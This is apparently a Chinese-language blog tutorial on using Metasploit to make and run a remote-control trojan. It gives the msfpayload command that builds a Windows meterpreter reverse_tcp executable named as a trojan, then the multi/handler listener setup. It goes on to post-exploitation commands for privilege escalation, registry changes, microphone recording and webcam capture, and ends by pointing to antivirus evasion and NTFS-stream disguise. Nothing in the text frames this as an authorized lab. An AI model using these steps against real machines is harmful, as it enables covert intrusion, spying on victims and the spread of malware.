metasploit是一個開源的功能強大的安全漏洞檢測工具,也是非常厲害的滲透測試工具。它是一個強大的開源平臺,供開發,測試和使用惡意代碼,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠平臺。
這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平臺上常見的溢出漏洞和流行的 shellcode ,并且不斷更新。目前的版本收集了數百個實用的溢出攻擊程序及一些輔助工具,讓人們使用簡單的方法完成安全漏洞檢測,即使一個不懂安全的人也可以輕松的使用它。
我們可以下載Windows版本進行安裝,官方網站http://www.metasploit.com/
也可以利用kali linux自帶的,無需安裝。
Metasploit目前提供了三種用戶使用接口,一個是GUI模式,另一個是console模式,第三種是CLI(命令行)模式
這里我們利用metasploit進行遠程控制,利用他生成木馬,將我們的木馬運行在目標主機就ok了。
木馬 控制端 服務端
0x01、制作木馬
獲取meterpreter,首先根據我們的ip生成一個木馬
msfpayload windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=55555 X > muma.exe

reverse_tcp 反向連接 (本機監聽) // 是服務器來連接攻擊者,返回一個SHELL
Windows常用攻擊載荷:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
0x02、使用metasploit控制端
使用msfconsole 啟動metasploit的命令行模式
msfconsole
use exploit/multi/handler #使用handler模塊監聽連入的backdooer
show options #查看參數

set PAYLOAD windows/meterpreter/reverse_tcp #設置對應的payload
此處ip和端口都填寫木馬對應的ip和端口

set LHOST IP
set LPORT 端口

exploit
當我們運行木馬時,此時我們已經中毒
這樣我們就遠程連接到電腦,可以進行更為深入的操作了
sysinfo #獲取系統信息
getsystem #獲取高權限
reg #修改注冊表
record_mic #音頻錄制
webcam_stream #攝像頭視頻獲取
......
對于木馬,我們可以做相應的免殺躲過殺毒軟件的報毒,以及可以利用我們上個博客講的NTFS流進行偽裝。